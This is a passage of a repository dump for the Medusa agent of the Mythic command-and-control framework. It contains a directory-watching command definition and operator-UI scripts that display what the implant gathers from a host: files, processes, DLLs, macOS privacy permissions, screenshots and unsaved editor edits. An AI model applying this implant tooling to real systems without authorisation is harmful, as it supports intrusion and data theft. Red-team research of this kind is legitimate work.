    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\n\nclass WatchDirArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )],\n                description=\"Path of folder on the current system to watch\",\n            ),\n            CommandParameter(\n                name=\"seconds\",\n                type=ParameterType.Number,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                default_value=60, \n                description=\"Seconds to wait between polling directory for changes\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"path\", pieces[0])\n                self.add_arg(\"seconds\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass WatchDirCommand(CommandBase):\n    cmd = \"watch_dir\"\n    needs_admin = False\n    help_cmd = \"watch_dir [/path/to/file]\"\n    description = \"Poll a directory for changes\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [\"T1083\"]\n    argument_class = WatchDirArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        
supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Polling {} for changes every {} seconds\".format(task.args.get_arg(\"path\"), str(task.args.get_arg(\"seconds\")))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/copy_additional_info_to_clipboard.js",
    "content": "function(elem){\n    function copyStringToClipboard(str) {\n        // Create new element\n        let el = document.createElement('textarea');\n        // Set value (string to be copied)\n        el.value = str;\n        // Set non-editable to avoid focus and move outside of view\n        el.setAttribute('readonly', '');\n        el.style = {position: 'absolute', left: '-9999px'};\n        document.body.appendChild(el);\n        // Select text inside element\n        el.select();\n        // Copy text to clipboard\n        document.execCommand('copy');\n        // Remove temporary element\n        document.body.removeChild(el);\n        alertTop(\"info\", \"Copied...\", 1);\n    }\n    var content = atob(elem.getAttribute(\"additional-info\"));\n    copyStringToClipboard(content);\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/create_table.js",
    "content": "function(headers, data){\n  let output = \"<table style='overflow:scroll;white-space:nowrap;width:100%;color:white' class='table-striped border border-dark shadow table-dark table-condensed'>\";\n  output += \"<tr>\";\n  for(let i = 0; i < headers.length; i++){\n    output += \"<th style='background-color:#393485;color:white;height:40px;text-align:left;padding:0px 0px 0px 20px;width:\" + headers[i]['size'] + \"' onclick=\\\"sort_table(this)\\\">\" + headers[i]['name'].toUpperCase() + \"</th>\";\n  }\n  output += \"</tr>\";\n  for(let i = 0; i < data.length; i++){\n    output += \"<tr style='text-align:left;\" + data[i]['row-style'] + \"'>\";\n    for(let j = 0; j < headers.length; j++){\n     if(data[i]['cell-style'].hasOwnProperty(headers[j])){\n        output += \"<td style='padding:0px 0px 0px 20px;\" + data[i]['cell-style'][headers[j]['name']] + \"'>\" + data[i][headers[j]['name']] + \"</td>\";\n     }\n     else{\n        output += \"<td style='padding:0px 0px 0px 20px'>\" + data[i][headers[j]['name']] + \"</td>\";\n     }\n    }\n    output += \"</tr>\";\n  }\n  output += \"</table>\";\n  return output;\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/download.js",
    "content": "function(task, responses){\n    if(task.status.includes(\"error\")){\n        const combined = responses.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    }else if(task.completed){\n        try{\n            let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n            return {\"download\":[{\n                \"agent_file_id\": data[\"agent_file_id\"],\n                \"variant\": \"contained\",\n                \"name\": \"Download \" + task[\"display_params\"]\n            }]};\n        }catch(error){\n            const combined = responses.reduce( (prev, cur) => {\n                return prev + cur;\n            }, \"\");\n            return {'plaintext': combined};\n        }\n\n    }else if(task.status === \"processed\"){\n        if(responses.length > 0){\n            const task_data = JSON.parse(responses[0]);\n            return {\"plaintext\": \"Downloading file with \" + task_data[\"total_chunks\"] + \" total chunks...\"};\n        }\n        return {\"plaintext\": \"No data yet...\"}\n    }else{\n        // this means we shouldn't have any output\n        return {\"plaintext\": \"No response yet from agent...\"}\n    }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/download_bulk.js",
    "content": "function(task, responses){\n    if(task.status.includes(\"error\")){\n        const combined = responses.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    } else if(task.completed){\n        if(responses.length === 0){\n            return {'plaintext': 'No response from agent.'};\n        }\n        // Iterative mode returns one JSON object per file, one per line.\n        // Archive mode returns a single JSON object with agent_file_id.\n        const lines = responses[0].split('\\n').filter(l => l.trim().length > 0);\n        let downloads = [];\n        let plainLines = [];\n        for(let i = 0; i < lines.length; i++){\n            try{\n                let data = JSON.parse(lines[i].replace((new RegExp(\"'\", 'g')), '\"'));\n                if(\"agent_file_id\" in data){\n                    let label = \"file_path\" in data\n                        ? \"Download \" + data[\"file_path\"]\n                        : \"Download \" + task[\"display_params\"];\n                    downloads.push({\n                        \"agent_file_id\": data[\"agent_file_id\"],\n                        \"variant\": \"contained\",\n                        \"name\": label\n                    });\n                } else {\n                    plainLines.push(lines[i]);\n                }\n            } catch(error){\n                plainLines.push(lines[i]);\n            }\n        }\n        if(downloads.length > 0){\n            let result = {\"download\": downloads};\n            if(plainLines.length > 0){\n                result[\"plaintext\"] = plainLines.join('\\n');\n            }\n            return result;\n        }\n        return {'plaintext': responses[0]};\n    } else if(task.status === \"processed\"){\n        if(responses.length > 0){\n            try{\n                const task_data = JSON.parse(responses[0]);\n                if(\"total_chunks\" in task_data){\n              
      return {\"plaintext\": \"Downloading with \" + task_data[\"total_chunks\"] + \" total chunks...\"};\n                }\n            } catch(error){}\n            return {\"plaintext\": responses[0]};\n        }\n        return {\"plaintext\": \"No data yet...\"};\n    } else {\n        return {\"plaintext\": \"No response yet from agent...\"};\n    }\n}\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/file_size_to_human_readable_string.js",
    "content": "function(fileSize){\n    var thresh = 1024;\n    if(Math.abs(fileSize) < thresh) {\n        return fileSize + ' B';\n    }\n    var units = ['KB','MB','GB','TB','PB','EB','ZB','YB'];\n    var u = -1;\n    do {\n        fileSize /= thresh;\n        ++u;\n    } while(Math.abs(fileSize) >= thresh && u < units.length - 1);\n    return fileSize.toFixed(1)+' '+units[u];\n  return output;\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/jobs.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length > 0){\n          try{\n                  let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n                  let entries = data[\"jobs\"];\n                  let output_table = [];\n                  for(let i = 0; i < entries.length; i++){\n                      output_table.push({\n                          \"command\":{\"plaintext\": entries[i][0]},\n                          \"task_id\": {\"plaintext\": entries[i][1], \"copyIcon\": true},\n                          \"rowStyle\": {\"backgroundColor\": \"mediumpurple\"}\n                      })\n                  }\n                  return {\n                      \"table\": [\n                          {\n                              \"headers\": [\n                                  {\"plaintext\": \"command\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"task_id\", \"type\": \"string\", \"fillWidth\": true},\n                              ],\n                              \"rows\": output_table,\n                              \"title\": \"Running Jobs\"\n                          }\n                      ]\n                  }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/list_apps.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          try{\n                  let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n                  let entries = data[\"apps\"];\n                  let output_table = [];\n                  for(let i = 0; i < entries.length; i++){\n                      output_table.push({\n                          \"PID\":{\"plaintext\": entries[i][\"pid\"]},\n                          \"Name\":{\"plaintext\": entries[i][\"name\"]},\n                          \"Executable URL\":{\"plaintext\": entries[i][\"exec_url\"], \"copyIcon\": true},\n                          \"rowStyle\": {}\n                      })\n                  }\n                  return {\n                      \"table\": [\n                          {\n                              \"headers\": [\n                                  {\"plaintext\": \"PID\", \"type\": \"string\"},\n                                  {\"plaintext\": \"Name\", \"type\": \"string\",\"width\": 180},\n                                  {\"plaintext\": \"Executable URL\", \"type\": \"string\"},\n                              ],\n                              \"rows\": output_table,\n                              \"title\": \"Apps\"\n                          }\n                      ]\n                  }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to 
display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/list_dlls.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          try{\n                  let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n                  let entries = data[\"dlls\"];\n                  let output_table = [];\n                  for(let i = 0; i < entries.length; i++){\n                      output_table.push({\n                          \"DLL\":{\"plaintext\": entries[i], \"copyIcon\": true},\n                          \"rowStyle\": {}\n                      })\n                  }\n                  return {\n                      \"table\": [\n                          {\n                              \"headers\": [\n                                  {\"plaintext\": \"DLL\", \"type\": \"string\"},\n                              ],\n                              \"rows\": output_table,\n                              \"title\": \"Loaded DLLs\"\n                          }\n                      ]\n                  }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/ls.js",
    "content": "function(task, response){\n  if(task.status.includes(\"error\")){\n    const combined = response.reduce( (prev, cur) => {\n        return prev + cur;\n    }, \"\");\n    return {'plaintext': combined};\n  }else if(task.completed && response.length > 0){\n\n    // tables styles\n    let folder = {\n      backgroundColor: \"mediumpurple\",\n      color: \"white\"\n    };\n    let file = {};\n\n    var archiveFormats = [\".a\",\".ar\",\".cpio\",\".shar\",\".LBR\",\".lbr\",\".mar\",\".sbx\",\".tar\",\".bz2\",\".F\",\".gz\",\".lz\",\".lz4\",\".lzma\",\".lzo\",\".rz\",\".sfark\",\".sz\",\".?Q?\",\".?Z?\",\".xz\",\".z\",\".Z\",\".zst\",\".??\",\".7z\",\".s7z\",\".ace\",\".afa\",\".alz\",\".apk\",\".arc\",\".arc\",\".arj\",\".b1\",\".b6z\",\".ba\",\".bh\",\".cab\",\".car\",\".cfs\",\".cpt\",\".dar\",\".dd\",\".dgc\",\".ear\",\".gca\",\".ha\",\".hki\",\".ice\",\".jar\",\".kgb\",\".lzh\",\".lzx\",\".pak\",\".pak\",\".parti\",\".paq6\",\".pea\",\".pim\",\".pit\",\".qda\",\".rar\",\".rk\",\".sda\",\".sea\",\".sen\",\".sfx\",\".shk\",\".sit\",\".sitx\",\".sqx\",\".tar\",\".tbz2\",\".uc\",\".uca\",\".uha\",\".war\",\".wim\",\".xar\",\".xp3\",\".yz1\",\".zip\",\".zoo\",\".zpaq\",\".zz\",\".ecc\",\".ecsbx\",\".par\",\".par2\",\".rev\"];\n    var diskImages = [\".dmg\", \".iso\", \".vmdk\"];\n    var wordDocs = [\".doc\", \".docx\", \".dotm\", \".dot\", \".wbk\", \".docm\", \".dotx\", \".docb\"];\n    var excelDocs = [\".xls\", \".xlsx\", \".xlsm\", \".xltx\", \".xltm\", \".xlmx\", \".xlmt\"];\n    var powerPoint = [\".ppt\", \".pptx\", \".potx\", \".ppsx\", \".thmx\", \".pot\", \".pps\"];\n    var pdfExt = [\".pdf\"];\n    var dbExt = [\".db\", \".sql\", \".psql\"];\n    var keyFiles = [\".pem\", \".ppk\"];\n    var scriptFiles = [\".config\", \".ps1\", \".psm1\", \".psd1\", \".vbs\", \".js\", \".py\", \".pl\", \".rb\", \".go\", \".xml\", \".html\", \".css\", \".sh\", \".bash\", \".yaml\", \".yml\"];\n    // var uniqueName = task.id + 
\"_additional_permission_info_modal\";\n    \n    let rows = [];\n    let data = \"\";\n\n    try{\n      data = JSON.parse(response[0]);\n    }catch(error){\n      const combined = response.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n    }\n    \n    let headers = [\n      {\"plaintext\": \"name\", \"type\": \"string\", \"fillWidth\": true},\n      {\"plaintext\": \"size\", \"type\": \"size\", \"width\": 185},\n      {\"plaintext\": \"last_accessed\", \"type\": \"string\", \"width\": 285},\n      {\"plaintext\": \"last_modified\", \"type\": \"string\", \"width\": 285},\n      {\"plaintext\": \"actions\", \"type\": \"button\", \"width\": 90, \"disableSort\": true},\n    ];\n\n    \n\n    for(let i = 0; i < data[\"files\"].length; i++){\n      let ls_path = \"\";\n      let sep = data[\"parent_path\"].includes(\"/\") ? \"/\": \"\\\\\";\n\n      if(data[\"parent_path\"] === \"/\"){\n          ls_path = data[\"parent_path\"] + data[\"name\"] + sep + data[\"files\"][i][\"name\"];\n      }else{\n          ls_path = data[\"parent_path\"] + sep + data[\"name\"] + sep + data[\"files\"][i][\"name\"];\n      }\n      \n      var icon = \"\";\n      if (data[\"files\"][i][\"is_file\"] ===  true) {\n        var fileExt = \".\" + data[\"files\"][i]['name'].split(\".\").slice(-1)[0].toLowerCase();\n        \n        if (archiveFormats.includes(fileExt)) {\n          icon = 'archive/zip';\n        } else if (diskImages.includes(fileExt)) {\n          icon = 'diskimage';\n        } else if (wordDocs.includes(fileExt)) {\n          icon = 'word';\n        } else if (excelDocs.includes(fileExt)){\n          icon = 'excel';\n        } else if (powerPoint.includes(fileExt)) {\n          icon = 'powerpoint';\n        } else if (pdfExt.includes(fileExt)){\n          icon = 'pdf/adobe';\n        } else if (dbExt.includes(fileExt)) {\n          icon = 'database';\n        } else if (keyFiles.includes(fileExt)) {\n         
 icon = 'key';\n        } else if (scriptFiles.includes(fileExt)) {\n          icon = 'code/source';\n        } else {\n          icon = 'code/source';\n        }\n      } else {\n        icon = 'closedFolder';\n      }\n\n      let row = {\n          \"rowStyle\": data[\"files\"][i][\"is_file\"] ? file:  folder,\n          \"name\": {\n            \"plaintext\": data[\"files\"][i][\"name\"],\n            \"startIcon\": icon\n          },\n          \"size\": {\"plaintext\": String(data[\"files\"][i][\"size\"])},\n          \"last_accessed\": {\"plaintext\": String(new Date(data[\"files\"][i][\"access_time\"]))},\n          \"last_modified\": {\"plaintext\": String(new Date(data[\"files\"][i][\"modify_time\"]))},\n          \"actions\": {\"button\": {\n          \"name\": \"Actions\",\n          \"type\": \"menu\",\n          \"value\": [\n                  {\n                      \"name\": \"View XATTRs\",\n                      \"type\": \"dictionary\",\n                      \"value\": data[\"files\"][i][\"permissions\"],\n                      \"leftColumnTitle\": \"XATTR\",\n                      \"rightColumnTitle\": \"Values\",\n                      \"title\": \"Viewing XATTRs\"\n                  },\n                  {\n                      \"name\": \"LS Path\",\n                      \"type\": \"task\",\n                      \"ui_feature\": \"file_browser:list\",\n                      \"parameters\": ls_path\n                  },\n                  {\n                    \"name\": \"Download File\",\n                    \"type\": \"task\",\n                    \"disabled\": !data[\"files\"][i][\"is_file\"],\n                    \"ui_feature\": \"file_browser:download\",\n                    \"parameters\": ls_path\n                  }\n              ]\n          }}\n      };\n      rows.push(row);\n    }\n\n    return {\"table\":[{\n      \"headers\": headers,\n      \"rows\": rows,\n      \"title\": \"File Listing Data\"\n    }]};\n\n  }\n  else 
if(task.status === \"processed\"){\n    // this means we're still downloading\n    return {\"plaintext\": \"Only have partial data so far...\"}\n  }else{\n    // this means we shouldn't have any output\n    return {\"plaintext\": \"Not response yet from agent...\"}\n}\n  \n\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/ps.js",
    "content": "function(task, response){\n    if(task.status.includes(\"error\")){\n        const combined = response.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    }else if(task.completed){\n        if(response.length > 0){\n            try{\n                    let data = JSON.parse(response[0]);\n                    let entries = data[\"processes\"];\n                    let output_table = [];\n  \n                    for(let i = 0; i < entries.length; i++){\n                      output_table.push({\n                            \"UID\":{\"plaintext\":  (!\"user_id\" in entries[i]) ? ' ' : entries[i]['user_id'] },\n                            \"PID\":{\"plaintext\": String(entries[i][\"process_id\"]) },\n                            \"PPID\":{\"plaintext\": ((!\"parent_process_id\" in entries[i]) ? ' ' : entries[i]['parent_process_id']) },\n                            \"Name\":{\"plaintext\": ((!\"name\" in entries[i]) ? ' ' : entries[i]['name']) },\n                            \"Arch\":{\"plaintext\": ((!\"architecture\" in entries[i]) ? ' ' : entries[i]['architecture']) },\n                            \"Bin Path\":{\"plaintext\": ((!\"bin_path\" in entries[i]) ? 
' ' : entries[i]['bin_path']) },\n                            \"actions\": {\"button\": {\n                              \"name\": \"Actions\",\n                              \"type\": \"menu\",\n                              \"value\": [\n                                      {\n                                          \"name\": \"List DLLs\",\n                                          \"type\": \"task\",\n                                          \"ui_feature\": \"process_dlls:list\",\n                                          \"parameters\": { \"process_id\": entries[i][\"process_id\"] }\n                                      },\n                                  ]\n                              }},\n                            \"rowStyle\": {}\n                        })\n                    }\n                    return {\n                        \"table\": [\n                            {\n                                \"headers\": [\n                                  {\"plaintext\": \"UID\", \"type\": \"string\",\"width\": 90,\"disableSort\": true},\n                                  {\"plaintext\": \"PID\", \"type\": \"string\",\"width\": 90,\"disableSort\": true},\n                                  {\"plaintext\": \"PPID\", \"type\": \"string\",\"width\": 90,\"disableSort\": true},\n                                  {\"plaintext\": \"Name\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"Arch\", \"type\": \"string\", \"width\": 70},\n                                  {\"plaintext\": \"Bin Path\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"actions\", \"type\": \"button\", \"width\": 90, \"disableSort\": true},\n                                  ],\n                                \"rows\": output_table,\n                                \"title\": \"Running processes\"\n                            }\n                        ]\n                    }\n    
        }catch(error){\n                    console.log(error);\n                    const combined = response.reduce( (prev, cur) => {\n                        return prev + cur;\n                    }, \"\");\n                    return {'plaintext': combined};\n            }\n        }else{\n            return {\"plaintext\": \"No output from command\"};\n        }\n    }else{\n        return {\"plaintext\": \"No data to display...\"};\n    }\n  }"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/ps_full.js",
    "content": "function(task, response){\n    if(task.status.includes(\"error\")){\n        const combined = response.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    }else if(task.completed){\n        if(response.length > 0){\n            try{\n                    let data = JSON.parse(response[0]);\n                    let entries = data[\"processes\"];\n                    let output_table = [];\n  \n                    for(let i = 0; i < entries.length; i++){\n                      \n                      output_table.push({\n                            \"PID\":{\"plaintext\": String(entries[i][\"process_id\"]), \"copyIcon\": true},\n                            \"PPID\":{\"plaintext\": ((!entries[i].hasOwnProperty(\"parent_process_id\")) ? ' ' : String(entries[i]['parent_process_id'])) },\n                            \"Name\":{\"plaintext\": ((!\"name\" in entries[i]) ? ' ' : entries[i]['name']) },\n                            \"Arch\":{\"plaintext\": ((!\"architecture\" in entries[i]) ? ' ' : entries[i]['architecture']) },\n                            \"Integrity Level\":{\"plaintext\": ((!entries[i].hasOwnProperty(\"integrity_level\")) ? ' ' : String(entries[i]['integrity_level'])) },\n                            \"Command Line\":{\"plaintext\": ((!\"command_line\" in entries[i]) ? ' ' : entries[i]['command_line']) },\n                            \"Bin Path\":{\"plaintext\": ((!\"bin_path\" in entries[i]) ? 
' ' : entries[i]['bin_path']), \"copyIcon\": true},\n                            \"actions\": {\"button\": {\n                              \"name\": \"Actions\",\n                              \"type\": \"menu\",\n                              \"value\": [\n                                      {\n                                          \"name\": \"List DLLs\",\n                                          \"type\": \"task\",\n                                          \"ui_feature\": \"process_dlls:list\",\n                                          \"parameters\": { \"process_id\": String(entries[i][\"process_id\"]) }\n                                      },\n                                      {\n                                        \"name\": \"View Details\",\n                                        \"type\": \"dictionary\",\n                                        \"value\": entries[i],\n                                        \"leftColumnTitle\": \"Field\",\n                                        \"rightColumnTitle\": \"Value\",\n                                        \"title\": \"Viewing All Data\"\n                                    },\n                                  ]\n                              }},\n                            \"rowStyle\": {}\n                        })\n                    }\n                    return {\n                        \"table\": [\n                            {\n                                \"headers\": [\n                                    {\"plaintext\": \"PID\", \"type\": \"string\",\"width\": 90,\"disableSort\": true},\n                                    {\"plaintext\": \"PPID\", \"type\": \"string\", \"width\": 90,\"disableSort\": true},\n                                    {\"plaintext\": \"Name\", \"type\": \"string\", \"fillWidth\": true},\n                                    {\"plaintext\": \"Arch\", \"type\": \"string\", \"width\": 70},\n                                    {\"plaintext\": 
\"Integrity Level\", \"type\": \"string\", \"width\": 70},\n                                    {\"plaintext\": \"Command Line\", \"type\": \"string\", \"fillWidth\": true},\n                                    {\"plaintext\": \"Bin Path\", \"type\": \"string\", \"fillWidth\": true},\n                                    {\"plaintext\": \"actions\", \"type\": \"button\", \"width\": 90, \"disableSort\": true},\n                                  ],\n                                \"rows\": output_table,\n                                \"title\": \"Running processes\"\n                            }\n                        ]\n                    }\n            }catch(error){\n                    console.log(error);\n                    const combined = response.reduce( (prev, cur) => {\n                        return prev + cur;\n                    }, \"\");\n                    return {'plaintext': combined};\n            }\n        }else{\n            return {\"plaintext\": \"No output from command\"};\n        }\n    }else{\n        return {\"plaintext\": \"No data to display...\"};\n    }\n  }"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/screenshot.js",
    "content": "function(task, responses){\n    if(task.status.includes(\"error\")){\n        const combined = responses.reduce( (prev, cur) => {\n            return prev + cur;\n        }, \"\");\n        return {'plaintext': combined};\n    }else if(task.completed){\n        if(responses.length > 0){\n            let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n            return {\"screenshot\":[{\n                \"agent_file_id\": data[\"file_id\"],\n                \"variant\": \"contained\",\n                \"name\": \"View Screenshot\"\n            }]};\n        }else{\n            return {\"plaintext\": \"No data to display...\"}\n        }\n\n    }else if(task.status === \"processed\"){\n        // this means we're still downloading\n        if(responses.length > 0){\n            let data = JSON.parse(responses[0]);\n            return {\"screenshot\":[{\n                \"agent_file_id\": data[\"file_id\"],\n                \"variant\": \"contained\",\n                \"name\": \"View Partial Screenshot\"\n            }]};\n        }\n        return {\"plaintext\": \"No data yet...\"}\n    }else{\n        // this means we shouldn't have any output\n        return {\"plaintext\": \"Not response yet from agent...\"}\n    }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/tcc.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          var auth_values = [\n            \"Access Denied\", \n            \"Unknown\",\n            \"Allowed\",\n            \"Limited\"\n          ];\n      \n          var auth_reason = [\n            \"Error\",\n            \"User Consent\",\n            \"User Set\",\n            \"System Set\",\n            \"Service Policy\",\n            \"MDM Policy\",\n            \"Override Policy\",\n            \"Missing usage string\",\n            \"Prompt Timeout\",\n            \"Preflight Unknown\",\n            \"Entitled\",\n            \"App Type Policy\",\n          ];\n      \n          var client_type = [\n            \"Bundle Identifier\",\n            \"Absolute Path\"\n          ];\n\n          try{\n                  let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n                  let entries = data[\"tcc\"];\n                  let output_table = [];\n                  for(let i = 0; i < entries.length; i++){\n                      \n                      let clienttype = client_type[entries[i]['client_type']];\n                      let authval = auth_values[entries[i]['auth_value']];\n                      let authres = auth_reason[entries[i]['auth_reason']];\n\n                      output_table.push({\n                          \"Client\":{\"plaintext\": entries[i][\"client\"]},\n                          \"Service\":{\"plaintext\": entries[i][\"service\"]},\n                          \"Client Type\":  { \"plaintext\": clienttype },\n                          \"Auth Value\":  { \"plaintext\": authval },\n                          \"Auth Reason\":  { \"plaintext\": authres },\n                          \"Last Modified\": { 
\"plaintext\": new Date(entries[i]['last_modified'] * 1000).toString() },\n                          \"actions\": {\"button\": {\n                            \"name\": \"Actions\",\n                            \"type\": \"menu\",\n                            \"value\": [\n                                    {\n                                        \"name\": \"View All Data\",\n                                        \"type\": \"dictionary\",\n                                        \"value\": entries[i],\n                                        \"leftColumnTitle\": \"Field\",\n                                        \"rightColumnTitle\": \"Value\",\n                                        \"title\": \"Viewing All Data\"\n                                    },\n                                ]\n                            }},\n                          \"rowStyle\": {}\n                      })\n                  }\n                  return {\n                      \"table\": [\n                          {\n                              \"headers\": [\n                                  {\"plaintext\": \"Client\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"Service\", \"type\": \"string\", \"fillWidth\": true},\n                                  {\"plaintext\": \"Client Type\", \"type\": \"string\", \"width\": 160},\n                                  {\"plaintext\": \"Auth Value\", \"type\": \"string\", \"width\": 130},\n                                  {\"plaintext\": \"Auth Reason\", \"type\": \"string\", \"width\": 135},\n                                  {\"plaintext\": \"Last Modified\", \"type\": \"string\", \"width\": 285},\n                                  {\"plaintext\": \"actions\", \"type\": \"button\", \"width\": 90, \"disableSort\": true},\n                              ],\n                              \"rows\": output_table,\n                              \"title\": \"TCC\"\n                     
     }\n                      ]\n                  }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/vscode_edits.js",
    "content": "function(task, responses){\n  if(task.status.includes(\"error\")){\n      const combined = responses.reduce( (prev, cur) => {\n          return prev + cur;\n      }, \"\");\n      return {'plaintext': combined};\n  }else if(task.completed){\n      if(responses.length == 1){\n          try{\n\n            let folder = {\n                backgroundColor: \"mediumpurple\",\n                color: \"white\"\n              };\n            let file = {};\n\n            let data = JSON.parse(responses[0].replace((new RegExp(\"'\", 'g')), '\"'));\n            let entries = data[\"edits\"];\n            let output_table = [];\n            \n            for(let i = 0; i < entries.length; i++){\n\n                output_table.push({\n                    \"Backup File\":{ \"plaintext\": entries[i][\"backup\"], \"copyIcon\": true },\n                    \"Original File\":{ \"plaintext\": entries[i][\"original\"] },\n                    \"Size\":{ \"plaintext\": entries[i][\"size\"] },\n                    \"Modified Time\":{ \"plaintext\": entries[i][\"mtime\"] },\n                    \"Created Time\":{ \"plaintext\": entries[i][\"ctime\"] },\n                    \"Type\":{ \"plaintext\": entries[i][\"type\"] },\n                    \"rowStyle\": {},\n                })\n            }\n            return {\n                \"table\": [\n                    {\n                        \"headers\": [\n                            {\"plaintext\": \"Backup File\", \"type\": \"string\", \"fillWidth\": true},\n                            {\"plaintext\": \"Original File\", \"type\": \"string\", \"fillWidth\": true},\n                            {\"plaintext\": \"Size\", \"type\": \"string\", \"width\": 80},\n                            {\"plaintext\": \"Modified Time\", \"type\": \"string\", \"width\": 200},\n                            {\"plaintext\": \"Created Time\", \"type\": \"string\", \"width\": 200},\n                            {\"plaintext\": \"Type\", 
\"type\": \"string\", \"width\": 80},\n                        ],\n                        \"rows\": output_table,\n                        \"title\": \"Unsaved VSCode Edits\"\n                    }\n                ]\n            }\n          }catch(error){\n                  console.log(error);\n                  const combined = responses.reduce( (prev, cur) => {\n                      return prev + cur;\n                  }, \"\");\n                  return {'plaintext': combined};\n          }\n      }else{\n          return {\"plaintext\": \"No output from command\"};\n      }\n  }else{\n      return {\"plaintext\": \"No data to display...\"};\n  }\n}"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/browser_scripts/vscode_recent.js",
